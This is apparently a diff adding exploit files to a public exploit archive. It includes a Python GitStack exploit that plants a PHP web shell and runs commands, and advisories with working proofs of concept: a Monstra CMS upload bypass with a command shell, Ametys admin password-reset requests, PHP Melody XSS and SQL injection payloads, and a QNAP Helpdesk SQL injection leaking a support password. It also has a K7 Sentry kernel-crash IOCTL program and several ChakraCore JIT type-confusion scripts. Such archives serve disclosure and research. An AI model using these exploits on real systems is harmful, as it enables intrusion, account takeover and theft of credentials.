r = requests.post("http://{}/rest/repository/".format(ip), cookies={'csrftoken' : csrf_token}, data={'name' : repository, 'csrfmiddlewaretoken' : csrf_token})
if not "The repository has been successfully created" in r.text and not "Repository already exist" in r.text:
print "[-] Cannot create repository"
os._exit(0)
print "[+] Add user to repository"
r = requests.post("http://{}/rest/repository/{}/user/{}/".format(ip, repository, username))
if not "added to" in r.text and not "has already" in r.text:
print "[-] Cannot add user to repository"
os._exit(0)
print "[+] Disable access for anyone"
r = requests.delete("http://{}/rest/repository/{}/user/{}/".format(ip, repository, "everyone"))
if not "everyone removed from rce" in r.text and not "not in list" in r.text:
print "[-] Cannot remove access for anyone"
os._exit(0)
print "[+] Create backdoor in PHP"
r = requests.get('http://{}/web/index.php?p={}.git&a=summary'.format(ip, repository), auth=HTTPBasicAuth(username, 'p && echo "<?php system($_POST['a']); ?>" > c:GitStackgitphpexploit.php'))
print r.text.encode(sys.stdout.encoding, errors='replace')
print "[+] Execute command"
r = requests.post("http://{}/web/exploit.php".format(ip), data={'a' : command})
print r.text.encode(sys.stdout.encoding, errors='replace')
```

37
exploits/php/webapps/44045.md Normal file
View file

@ -0,0 +1,37 @@
## Vulnerabilities Summary
The following advisory describes a vulnerability found in Monstra CMS.
Monstra is “a modern and lightweight Content Management System. It is Easy to install, upgrade and use.”
The vulnerability found is a remote code execution vulnerability through an arbitrary file upload mechanism.
## Credit
An independent security researcher, Ishaq Mohammed, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
## Vendor response
We were not able to get the vendor to respond in any way, the software appears to have been left abandoned without support though this is not an official status on their site (last official patch was released on 2012-11-29), the github appears a bit more active (last commit from 2 years ago).
Without any vendor response the researcher was kind enough to create a patch that addresses this bug, its available here: https://github.com/monstra-cms/monstra/issues/426
CVE: CVE-2017-18048
## Vulnerabilities details
An editor can upload files to the Monstra CMS and can access them by clicking on them from the administrator portal. The default setup of Monstra CMS allows uploading of files only with certain extensions, forbidding all types of executable files which are mentioned in monstra\plugins\box\filesmanager\filesmanager.admin.php. However by simply uploading a php file with “PHP” (all characters in uppercase) extension will bypass this mechanism and will allow an attacker to execute shell commands on the server.
## Proof of Concept
Steps to Reproduce:
Login with a valid credentials of an Editor
Select Files option from the Dropdown menu of Content
Upload a file with PHP (uppercase)extenstion contaiing the below code:
```
<?php
$cmd=$_GET['cmd'];
system($cmd);
?>
```
Click on Upload
liOnce the file is uploaded Click on the uploaded file and add ?cmd= to the URL followed by a system command such as whoami,time,date etc.

137
exploits/php/webapps/44050.md Normal file
View file

@ -0,0 +1,137 @@
## Vulnerability Summary
The following advisory describes a password reset vulnerability found in Ametys CMS version 4.0.2
Ametys is “a free and open source content management system (CMS) written in Java. It is based on JSR-170 for content storage, Open Social for gadget rendering and a XML oriented framework.”
## Credit
An independent security researcher, Jose Luis, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
## Vendor response
Ametys has released patches to address this vulnerability Ametys version 4.0.3
For more details: https://issues.ametys.org/browse/RUNTIME-2582
CVE-2017-16935
## Vulnerability details
User controlled input is not sufficiently sanitized. Unauthenticated user can perform administrative operations without properly authorization.
Ametys CMS only checks the authorization if the request includes /cms/ in the web request.
By that, we can reset any password of users, including administrator users
## Proof of Concept
By sending the following POST request, we can obtain the list of users:
```
POST /plugins/core-ui/servercomm/messages.xml HTTP/1.1
Host: 192.168.196.128:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.196.128:8080/cms/www/index.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 213
Cookie: JSESSIONID=
Connection: close
content={"0":{"pluginOrWorkspace":"core","responseType":"text","url":"users/search.json","p
arameters":{"contexts":["/sites/www","/sites-
fo/www"],"criteria":"","limit":100,"page":1,"start":0}}}}&context.parameters={}
```
The server then will response with:
```
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Cocoon-Version: 2.1.13-dev
Content-Type: text/xml
Date: Tue, 03 Oct 2017 13:52:15 GMT
Connection: close
Content-Length: 1875
<?xml version="1.0" encoding="UTF-8"?><responses><response id="0" code="200"
duration="946">{"users":[{"firstname":"Simple","sortablename":"Contributor
Simple","populationLabel":"Ametys Demo
Users","populationId":"ametys_demo_users","fullname":"Simple
Contributor","login":"contrib","directory":"SQL
database","email":"contrib@example.com","lastname":"Contributor"},{"firstname":"User1","s
ortablename":"User1 User1","populationLabel":"FO Demo Users","populationId":"fo-demo-
users","fullname":"User1 User1","login":"user1@ametys.org","directory":"SQL
database","email":"user1@ametys.org","lastname":"User1"},{"firstname":"User3","sortablena
me":"User3 User3","populationLabel":"FO Demo Users","populationId":"fo-demo-
users","fullname":"User3 User3","login":"user3@ametys.org","directory":"SQL
database","email":"user3@ametys.org","lastname":"User3"},{"firstname":"Webmaster","sorta
blename":"User Webmaster","populationLabel":"Ametys Demo
Users","populationId":"ametys_demo_users","fullname":"Webmaster
User","login":"webmaster","directory":"SQL
database","email":"webmaster@example.com","lastname":"User"},{"firstname":"Manager","s
ortablename":"User Manager","populationLabel":"Ametys Demo
Users","populationId":"ametys_demo_users","fullname":"Manager
User","login":"manager","directory":"SQL
database","email":"manager@example.com","lastname":"User"},{"firstname":"Administrator"
,"sortablename":"User Administrator","populationLabel":"Ametys Demo
Users","populationId":"ametys_demo_users","fullname":"Administrator
User","login":"admin","directory":"SQL
database","email":"admin@example.com","lastname":"User"},{"firstname":"User2","sortable
name":"User2 User2","populationLabel":"FO Demo Users","populationId":"fo-demo-
users","fullname":"User2 User2","login":"user2@ametys.org","directory":"SQL
database","email":"user2@ametys.org","lastname":"User2"}]}</response></responses>
```
The value of the field “populationId” and “login”, we need these values for the next request
Now, we need perform another request to change the password of the admin user:
```
POST /plugins/core-ui/servercomm/messages.xml HTTP/1.1
Host: 192.168.196.128:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.196.128:8080/cms/www/index.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 345
Cookie: JSESSIONID=
Connection: close
content={"0":{"pluginOrWorkspace":"core-ui","responseType":"text","url":"client-
call","parameters":{"role":"org.ametys.plugins.core.user.UserDAO","methodName":"editUser"
,"parameters":["ametys_demo_users",{"login":"admin","password":"MYNEWPASSWORD","fi
rstname":"Administrator","lastname":"User","email":"admin@example.com"}]}}}&context.par
ameters={}
```
Once we have performed the request, the response is:
```
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Cocoon-Version: 2.1.13-dev
Content-Type: text/xml
Date: Tue, 03 Oct 2017 13:52:59 GMT
Connection: close
Content-Length: 374
<?xml version="1.0" encoding="UTF-8"?><responses><response id="0" code="200"
duration="110">{"firstname":"Administrator","sortablename":"User
Administrator","populationLabel":"Ametys Demo
Users","populationId":"ametys_demo_users","fullname":"Administrator
User","login":"admin","directory":"SQL
database","email":"admin@example.com","lastname":"User"}</response></responses>
```
Now you can log in as Admin with password MYNEWPASSWORD

53
exploits/php/webapps/44056.md Normal file
View file

@ -0,0 +1,53 @@
## Vulnerabilities Summary
The following advisory describes three (3) vulnerabilities found in PHP Melody version 2.7.3.
PHP Melody is a “self-hosted Video CMS which evolved over the last 9 years. SEO optimization, unbeaten security and speed are advantages you no longer have to compromise on.
A truly great CMS should help you save time and make your life easier not complicate it. Nobody enjoys spending time and money on inferior solutions. If you value your time, dont settle for anything but the best video CMS with a proven track record, constant support and updates.”
The vulnerabilities found in PHP Melody are:
Stored PreAuth XSS that leads to administrator account takeover
SQL Injection (1)
SQL Injection (2)
Credit
An independent security researcher, Paulos Yibelo, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
PHP Melody has released patches to address this vulnerability.
For more information: http://www.phpsugar.com/blog/2017/10/php-melody-v2-7-3-maintenance-release/
CVE: CVE-2017-15578, CVE-2017-15579
## Vulnerabilities details
Stored PreAuth XSS that leads to administrator account takeover
User controlled input is not sufficiently sanitized, such that by sending a POST request to page_manager.php with the following parameters (vulnerable parameter page_title)
```
page_manager.php?do=new&id=&author=&showinmenu=0&meta_keywords=555-555-0199@example.com&status=0&submit=Publish&page_name=Peter+Winter&page_title=408b7<script>alert(1)<%2fscript>f2faf
```
An attacker can trigger the vulnerability and when administrator/moderator/editor or anyone with privileges visits Admin access /admin/pages.php?page=1 the payload is triggered and the alert is executed.
SQL Injection (1)
User controlled input is not sufficiently sanitized, by sending a POST request to /phpmelody/admin/edit_category.php with the following parameters:
```
category=3&meta_keywords=555-555-0199@example.com&tag=categoryone&save=Save$name=Sample+Category+%231&image='&meta_title=555-555-0199@example.com
```
The vulnerable parameter is the POST “image” parameter. We can send a single quote () to verify and the server will respond with an SQL error. We can inject SQL Queries here or extract data.
This attack requires an admin/modernator or editor to visit a malicious website that will submit the form with a malicious “image” parameter as an Injection
SQL Injection (2)
SQL Injection is on a cookie-value and can be exploited without any user interaction.
The cookie value “aa_pages_per_page” is the vulnerable parameter and we can use time based SQL Injection techniques to verify,
The payload we used AND benchmark(20000000%2csha1(1))—makes the server sleep for a long time (5-20 seconds).

31
exploits/php/webapps/44059.md Normal file
View file

@ -0,0 +1,31 @@
## Vulnerability Summary
The following advisory describes an unauthorized file download vulnerability found in Horde Groupware version 5.2.21.
Horde Groupware Webmail Edition is “a free, enterprise ready, browser based communication suite. Users can read, send and organize email messages and manage and share calendars, contacts, tasks, notes, files, and bookmarks with the standards compliant components from the Horde Project. Horde Groupware Webmail Edition bundles the separately available applications IMP, Ingo, Kronolith, Turba, Nag, Mnemo, Gollem, and Trean.”
## Credit
An independent security researcher, Juan Pablo Lopez Yacubian, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
Horde Groupware was informed of the vulnerability, to which they response with:
“this has already been reported earlier by someone else, and is already fixed in the latest Gollem and Horde Groupware releases.
Besides that, its not sufficient to have a list of the servers users, you also need to exactly know the file name and path that you want to download. Finally, this only works on certain backends, where Horde alone is responsible for authentication, i.e. it wont work with backends that require explicit authentication.”
CVE: CVE-2017-15235
## Vulnerability details
User controlled input is not sufficiently sanitized when passed to File Manager (gollem) module (version 3.0.11).
The “fn” parameter does not validate certain met characters by causing the requested file or filesystem to be downloaded without credentials.
It is only necessary to know the username and the file name.
## Proof of Concept
```
User = this is the username in horde
/ = the Meta character /
/services/download/?app=gollem&dir=%2Fhome%2Fuser&backend=sqlhome&fn=/test.php
```

125
exploits/php/webapps/44060.md Normal file
View file

@ -0,0 +1,125 @@
## Vulnerability Summary
The following advisory describes a SQL injection found in QTS Helpdesk versions 1.1.12 and earlier.
QNAP helpdesk: “Starting from QTS 4.2.2 you can use the built-in Helpdesk app to directly submit help requests to QNAP from your NAS. To do so, ensure your NAS can reach the Internet, open Helpdesk from the App Center, and create a new Help Request. Helpdesk will automatically collect and attach NAS system information and system logs to your request, and you can provide other information such as the steps necessary to reproduce the error, the error message and screenshots so we can identify the problem faster.”
## Credit
An independent security researcher, Kacper Szurek, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
QNAP has released patches to address this vulnerability.
For more information: https://www.qnap.com/en/security-advisory/nas-201709-29
CVE: CVE-2017-13068
## Vulnerability details
In order to trigger the vulnerability, a user needs to have Remote Support option enabled.
User controlled input is not sufficiently sanitized, by sending a CLI request to www/App/Controllers/Cli/SupportUtils.php an attacker can trigger an SQL injection and receive the password of the _qnap_support user.
Code which is responsible for checking permissions is commented:
```
// if (strtolower(php_sapi_name()) !== 'cli') {
// $this->fileLogModel->logError('You can not use this function via web.', __FILE__);
// die('You can not use this function via web. File: ' . __FILE__);
// }
```
We can access registerExternalLog which executes setExternalLog
```
public function registerExternalLog($appName, $appLogPath)
{
$supportUtils = $this->model('SupportUtilsModel');
if (file_exists($appLogPath) && is_dir($appLogPath)) {
printf("\r\n[%s] You should assign a log file, not folder.\r\n", colorize($appName, 'ERROR'));
} else if (file_exists($appLogPath) && !is_dir($appLogPath)) {
if ($supportUtils->setExternalLog($appName, $appLogPath)) {
printf("\r\n[%s] Log path %s was registered.\r\n", colorize($appName, 'SUCCESS'), colorize($appLogPath, 'SUCCESS'));
} else {
printf("\r\n[%s] Register external log failed.\r\n", colorize($appName, 'ERROR'), colorize($appLogPath, 'ERROR'));
}
} else {
printf("\r\n[%s] Log file not found.\r\n", colorize($appName, 'ERROR'));
}
}
```
We can see the SQL injection in $appName in www/App/Models/SupportUtilsModel.php
```
public function setExternalLog($appName, $appLogPath)
{
$now = time();
$queryStr = "INSERT INTO external_log (appName, appLogPath, createdTime) VALUES ('$appName', '$appLogPath', '$now')";
$rowCount = 0;
try {
$rowCount = $this->db->queryNoneResult($queryStr);
} catch (\Exception $e) {
return false;
}
return $rowCount;
}
```
## Proof of Concept
First we need to check if the remote support is enabled on victims machine. We can check by sending the following CLI request:
```
CLI /apps/qdesk/cli/supportutils/upload/a HTTP/1.1
Host: 192.168.1.55:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4
Connection: close
```
If its not enable “Remote session is not enabled” text will be displayed.
Now we can trigger the SQL Injection by sending the following request:
````
CLI /apps/qdesk/cli/supportutils/applog/reg/bb',(SELECT/*a*/cfgValue/*a*/FROM/*a*/configuration/*a*/WHERE/*a*/cfgKey='tempPw'),'149881968')/*/::/etc/passwd HTTP/1.1
Host: 192.168.1.55:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4
Connection: close
````
The server will respond with
````
CLI /apps/qdesk/cli/supportutils/applog/list HTTP/1.1
Host: 192.168.1.55:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4
Connection: close
````
And the output should look like:
````
| App Name | Log Path | Create Time |
| bb | BqGgseHn <-- this is password | 1974-10-02 01:52:48 |
`````
Now you can login as:
Login: _qnap_support
Password: Obtained from SQL Injection

174
exploits/windows/dos/44046.md Normal file
View file

@ -0,0 +1,174 @@
## Vulnerability Summary
The following advisory describes an Crash found in K7 Total Security.
## Credit
An independent security researcher, Kyriakos Economou aka @kyREcon, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
## Vendor response
K7 has released patches to address this vulnerability K7TotalSecurity version 15.1.0.305
CVE: CVE-2017-18019
## Vulnerability details
User controlled input to K7Sentry device is not sufficiently sanitized, the user controlled input can be used to compare an arbitrary memory address with a fixed value which in turn can be used to read the content of arbitrary memory.
## Crash report
By sending invalid kernel pointer we can crash the K7 Total Security process as shown here:
```
1: kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: f8f8f8f8, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 88c93a63, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000002, (reserved)
Debugging Details:
------------------
*************************************************************************
*** ***
*** ***
*** Your debugger is not using the correct symbols ***
*** ***
*** In order for this command to work properly, your symbol path ***
*** must point to .pdb files that have full type information. ***
*** ***
*** Certain .pdb files (such as the public OS symbols) do not ***
*** contain the required information. Contact the group that ***
*** provided you with these symbols if you need this command to ***
*** work. ***
*** ***
*** Type referenced: kernel32!pNlsUserInfo ***
*** ***
*************************************************************************
*************************************************************************
*** ***
*** ***
*** Your debugger is not using the correct symbols ***
*** ***
*** In order for this command to work properly, your symbol path ***
*** must point to .pdb files that have full type information. ***
*** ***
*** Certain .pdb files (such as the public OS symbols) do not ***
*** contain the required information. Contact the group that ***
*** provided you with these symbols if you need this command to ***
*** work. ***
*** ***
*** Type referenced: kernel32!pNlsUserInfo ***
*** ***
*************************************************************************
READ_ADDRESS: f8f8f8f8
FAULTING_IP:
K7Sentry+a63
88c93a63 80384b cmp byte ptr [eax],4Bh
MM_INTERNAL_CODE: 2
IMAGE_NAME: K7Sentry.sys
DEBUG_FLR_IMAGE_TIMESTAMP: 54eda273
MODULE_NAME: K7Sentry
FAULTING_MODULE: 88c93000 K7Sentry
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: poc.exey_0x950
CURRENT_IRQL: 2
TRAP_FRAME: 9a15ba14 -- (.trap 0xffffffff9a15ba14)
ErrCode = 00000000
eax=f8f8f8f8 ebx=001ffea0 ecx=00000000 edx=001ffe90 esi=9a15bac0 edi=00000010
eip=88c93a63 esp=9a15ba88 ebp=9a15badc iopl=0 nv up ei ng nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010386
K7Sentry+0xa63:
88c93a63 80384b cmp byte ptr [eax],4Bh ds:0023:f8f8f8f8=??
Resetting default scope
LAST_CONTROL_TRANSFER: from 82aebe67 to 82a879d8
STACK_TEXT:
9a15b564 82aebe67 00000003 bf4bd6ad 00000065 nt!RtlpBreakWithStatusInstruction
9a15b5b4 82aec965 00000003 c0603e38 f8f8f8f8 nt!KiBugCheckDebugBreak+0x1c
9a15b978 82a9a9c5 00000050 f8f8f8f8 00000000 nt!KeBugCheck2+0x68b
9a15b9fc 82a4cf98 00000000 f8f8f8f8 00000000 nt!MmAccessFault+0x104
9a15b9fc 88c93a63 00000000 f8f8f8f8 00000000 nt!KiTrap0E+0xdc
WARNING: Stack unwind information not available. Following frames may be wrong.
9a15badc 82a43129 84a6c1f8 84d9fc30 84d9fc30 K7Sentry+0xa63
9a15baf4 82c3b7af 00000000 84d9fc30 84d9fca0 nt!IofCallDriver+0x63
9a15bb14 82c3eafe 84a6c1f8 84cdcd80 00000000 nt!IopSynchronousServiceTail+0x1f8
9a15bbd0 82c85ac2 00000028 84d9fc30 00000000 nt!IopXxxControlFile+0x810
9a15bc04 82a49db6 00000028 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
9a15bc04 76f16c74 00000028 00000000 00000000 nt!KiSystemServicePostCall
001ffdc8 76f1542c 7504ab4d 00000028 00000000 ntdll!KiFastSystemCallRet
001ffdcc 7504ab4d 00000028 00000000 00000000 ntdll!NtDeviceIoControlFile+0xc
001ffe2c 767fbbc5 00000028 9500286b 001ffe90 KERNELBASE!DeviceIoControl+0xf6
001ffe58 00f51e42 00000028 9500286b 001ffe90 kernel32!DeviceIoControlImplementation+0x80
001ffec4 00f57500 00000001 002a31b0 002a32c0 poc!wmain+0xe2 [e:\k7_2016\k7sentry_0x9500286b_win7_poc\k7sentry_0x9500286b\main.cpp @ 31]
001fff0c 767fef8c 7ffd7000 001fff58 76f3367a poc!__tmainCRTStartup+0xfe [f:\dd\vctools\crt\crtw32\startup\crt0.c @ 255]
001fff18 76f3367a 7ffd7000 76ec24f9 00000000 kernel32!BaseThreadInitThunk+0xe
001fff58 76f3364d 00f5757d 7ffd7000 00000000 ntdll!__RtlUserThreadStart+0x70
001fff70 00000000 00f5757d 7ffd7000 00000000 ntdll!_RtlUserThreadStart+0x1b
STACK_COMMAND: kb
FOLLOWUP_IP:
K7Sentry+a63
88c93a63 80384b cmp byte ptr [eax],4Bh
```
## Proof of Concept
The PoC has been tested on Windows 7 x86
```
#include <Windows.h>
#include <iostream>
using namespace std;
int wmain()
{
HANDLE hDevice = CreateFileW(L"\\\\.\\K7Sentry", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
{
cout << endl << "Failed accessing K7Sentry Device Driver. Error: " << dec << GetLastError() << endl;
cin.get();
return 0;
}
BYTE dummyBuf[0x20];
memset(dummyBuf, 0, sizeof(dummyBuf));
*(ULONG_PTR*)dummyBuf = 0xF8F8F8F8; //INVALID KERNEL POINTER TO TRIGGER PAGE FAULT POC.
cout << endl << "Sending malformed IOCTL..." << endl;
DWORD bytesReturned = 0;
DeviceIoControl(hDevice, 0x9500286B, dummyBuf, sizeof(dummyBuf), dummyBuf, sizeof(dummyBuf), &bytesReturned, NULL);
cin.get();
return 0;
}
```

40
exploits/windows/dos/44075.txt Normal file
View file

@ -0,0 +1,40 @@
It seems this is the patch for the bug.
https://github.com/Microsoft/ChakraCore/pull/4226/commits/874551dd00ff6f404e593c7e0162efb54b953f5a
The following two cases will bypass the fix.
1:
function opt() {
let obj = new Number(2.3023e-320);
for (let i = 0; i < 1; i++) {
obj.x = 1;
obj = +obj;
obj.x = 1;
}
}
function main() {
for (let i = 0; i < 100; i++) {
opt();
}
}
main();
2:
function opt() {
let obj = '2.3023e-320';
for (let i = 0; i < 1; i++) {
obj.x = 1;
obj = +obj;
obj.x = 1;
}
}
function main() {
for (let i = 0; i < 100; i++) {
opt();
}
}
main();

91
exploits/windows/dos/44076.js Normal file
View file

@ -0,0 +1,91 @@
/*
Let's consider the following example code.
function opt() {
let arr = [];
return arr['x'];
}
// Optimize the "opt" function.
for (let i = 0; i < 100; i++) {
opt();
}
Array.prototype.__defineGetter__('x', function () {
});
opt();
Once the "opt" function has been optimized, the getter function for "x" can't be invoked from the JITed code, instead it bailouts and invokes the getter. This is due to the DisableImplicitCallFlag flag.
Here's the function handling that logic.
template <class Fn>
inline Js::Var ExecuteImplicitCall(Js::RecyclableObject * function, Js::ImplicitCallFlags flags, Fn implicitCall)
{
// For now, we will not allow Function that is marked as HasNoSideEffect to be called, and we will just bailout.
// These function may still throw exceptions, so we will need to add checks with RecordImplicitException
// so that we don't throw exception when disableImplicitCall is set before we allow these function to be called
// as an optimization. (These functions are valueOf and toString calls for built-in non primitive types)
Js::FunctionInfo::Attributes attributes = Js::FunctionInfo::GetAttributes(function);
// we can hoist out const method if we know the function doesn't have side effect,
// and the value can be hoisted.
if (this->HasNoSideEffect(function, attributes))
{
// Has no side effect means the function does not change global value or
// will check for implicit call flags
return implicitCall();
}
// Don't call the implicit call if disable implicit call
if (IsDisableImplicitCall())
{
AddImplicitCallFlags(flags);
// Return "undefined" just so we have a valid var, in case subsequent instructions are executed
// before we bail out.
return function->GetScriptContext()->GetLibrary()->GetUndefined();
}
if ((attributes & Js::FunctionInfo::HasNoSideEffect) != 0)
{
// Has no side effect means the function does not change global value or
// will check for implicit call flags
return implicitCall();
}
// Save and restore implicit flags around the implicit call
Js::ImplicitCallFlags saveImplicitCallFlags = this->GetImplicitCallFlags();
Js::Var result = implicitCall();
this->SetImplicitCallFlags((Js::ImplicitCallFlags)(saveImplicitCallFlags | flags));
return result;
}
As you can see above, it checks if the DisableImplicitCallFlag flag is set using IsDisableImplicitCall, if it is, just returns undefined and bailouts.
The reason that the flag was set in the example code was because of the "arr" variable was allocated in the stack. It was preventing the object from leaking through implicit calls.
However, if the function has no side effect, the function gets called regardless of the flag. One such function that is marked as HasNoSideEffect, but we can abuse is the Object.prototype.valueOf method. This method returns "this" itself. So if we use this method as the getter, it will return the array object allocated in the stack.
PoC:
*/
function opt() {
let arr = [];
return arr['x'];
}
function main() {
let arr = [1.1, 2.2, 3.3];
for (let i = 0; i < 0x10000; i++) {
opt();
}
Array.prototype.__defineGetter__('x', Object.prototype.valueOf);
print(opt());
}
main();

49
exploits/windows/dos/44077.js Normal file
View file

@ -0,0 +1,49 @@
/*
Here's a snippet of ExecuteImplicitCall which is responsible for updating the ImplicitCallFlags flag.
template <class Fn>
inline Js::Var ExecuteImplicitCall(Js::RecyclableObject * function, Js::ImplicitCallFlags flags, Fn implicitCall)
{
...
Js::ImplicitCallFlags saveImplicitCallFlags = this->GetImplicitCallFlags();
Js::Var result = implicitCall();
this->SetImplicitCallFlags((Js::ImplicitCallFlags)(saveImplicitCallFlags | flags));
return result;
}
It updates the flag after the implicit call. So if an exception is thrown during the implicit call, the flag will remain not updated. And the execution will be broken until the exeception gets handled. Namely, if we can ignore the exception in any way, we can bypass the ImplicitCallFlags checks.
At this point, "typeof" comes to rescue. The weird handler for "typeof" catchs execptions and clears them. For example, in the following code, the exeception thrown from toString will be ignored.
let o = {
toString: () => {
throw 1;
}
};
typeof(this[o]);
So, we can bypass the ImplicitCallFlags checks by throwing an exception and clearing it using "typeof".
*/
function opt(arr, index) {
arr[0] = 1.1;
typeof(arr[index]);
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1, 2.2, 3.3];
for (let i = 0; i < 0x10000; i++) {
opt(arr, {});
}
opt(arr, {toString: () => {
arr[0] = {};
throw 1;
}});
print(arr[0]);
}
main();

26
exploits/windows/dos/44078.js Normal file
View file

@ -0,0 +1,26 @@
/*
If a native array is used as a prototype, it is converted to a Var array by the Js::JavascriptNativeFloatArray::SetIsPrototype method.
In the JIT compiler, it uses InitProto instructions to set object literals' prototype. But when optimizing those instructions, it doesn't reset the previous array validity even it can change the type of arrays. As a result, it can lead to type confusion.
Note: Expressions like "obj.__proto__" don't use InitProto instructions.
*/
function opt(arr, proto) {
arr[0] = 1.1;
let tmp = {__proto__: proto};
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1, 2.2, 3.3];
for (let i = 0; i < 10000; i++) {
opt(arr, {});
}
opt(arr, arr);
print(arr);
}
main();

48
exploits/windows/dos/44079.js Normal file
View file

@ -0,0 +1,48 @@
/*
This is simillar to the previous issue 1457. But this time, we use Array.prototype.reverse.
Array.prototype.reverse can be inlined and may invoke EnsureNonNativeArray to convert the prototype of "this" to a Var array.
Call flow: JavascriptArray::EntryReverse -> FillFromPrototypes -> ForEachOwnMissingArrayIndexOfObject -> EnsureNonNativeArray
To make that happen, the prototype must be a native array. But this usually can't be fulfilled, since once it's set as a prototype, it gets converted to a Var array. To bypass this, we can use Array.prototype.sort.
Here's a snippet of JavascriptArray::EntrySort.
arr = JavascriptNativeFloatArray::ConvertToVarArray((JavascriptNativeFloatArray*)arr);
JS_REENTRANT(jsReentLock, arr->Sort(compFn));
arr = arr->ConvertToNativeArrayInPlace<JavascriptNativeFloatArray, double>(arr);
If "this" is a native array, the "sort" method first converts it to a Var array, sorts it, and then converts it back to the original type. So by setting it as a prototype in the compare function, we can make an object that its prototype is a native array.
PoC:
*/
function opt(arr, arr2) {
arr2[0];
arr[0] = 1.1;
arr2.reverse();
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1, 2.2, 3.3];
arr.__proto__ = null; // avoid inline caching
delete arr[1]; // avoid doArrayMissingValueCheckHoist
let arr2 = [, {}];
arr2.__proto__ = {};
arr2.reverse = Array.prototype.reverse;
for (let i = 0; i < 10000; i++) {
opt(arr, arr2);
}
Array.prototype.sort.call(arr, () => {
arr2.__proto__.__proto__ = arr;
});
opt(arr, arr2);
print(arr[0]);
}
main();

32
exploits/windows/dos/44080.js Normal file
View file

@ -0,0 +1,32 @@
/*
This is similar to the previous issues 1457, 1459 (MSRC 42551, MSRC 42552).
If a JavaScript function is used as a consturctor, it sets the new object's "__proto__" to its "prototype". The JIT compiler uses NewScObjectNoCtor instructions to perform it, but those instructions are not checked by CheckJsArrayKills which is used to validate the array information.
PoC:
*/
function inlinee() {
}
function opt(arr) {
arr[0] = 1.1;
new inlinee();
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1];
for (let i = 0; i < 10000; i++) {
inlinee.prototype = {};
opt(arr);
}
inlinee.prototype = arr;
opt(arr);
print(arr);
}
main();

23
exploits/windows/dos/44081.js Normal file
View file

@ -0,0 +1,23 @@
/*
LdThis instructions' value type is assumed to be "Object". Since "this" can be other objects like an array, it has to be assumed to be "LikelyObject", otherwise, operations to "this" will not be checked properly.
PoC:
*/
function opt(arr) {
arr[0] = 1.1;
this[0] = {};
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1];
for (let i = 0; i < 10000; i++) {
opt.call({}, arr);
}
opt.call(arr, arr);
print(arr);
}
main();

39
exploits/windows/local/44042.md Normal file
View file

@ -0,0 +1,39 @@
## Vulnerability Summary
The following advisory describes a information disclosure found in Hotspot Shield.
Hotspot Shield “provides secure and private access to a free and open internet. Enabling access to social networks, sports, audio and video streaming, news, dating, gaming wherever you are.”
## Credit
An independent security researcher, Paulos Yibelo, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
“Thank you very much again for contacting us. The info is being reviewed and if there are any questions/comments, well contact you by re-opening this ticket”
CVE: CVE-2018-6460
## Vulnerability details
The HotspotShiled product runs webserver with a static IP 127.0.0.1 and port 895.
